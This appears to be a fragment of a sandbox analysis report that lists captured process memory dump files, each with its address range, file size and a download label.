memory/2912-206-0x000000001C810000-0x000000001C81C000-memory.dmp

Filesize
48KB

Download
memory/2912-202-0x000000001C7C0000-0x000000001C7D2000-memory.dmp

Filesize
72KB

Download
memory/2912-199-0x000000001C790000-0x000000001C79C000-memory.dmp

Filesize
48KB

Download
memory/2912-198-0x000000001C740000-0x000000001C796000-memory.dmp

Filesize
344KB

Download
memory/2912-197-0x000000001C720000-0x000000001C730000-memory.dmp

Filesize
64KB

Download
memory/3260-497-0x0000019BD2C00000-0x0000019BD3704000-memory.dmp

Filesize
11.0MB

Download
memory/4552-33-0x0000000000400000-0x00000000005D7000-memory.dmp

Filesize
1.8MB

Download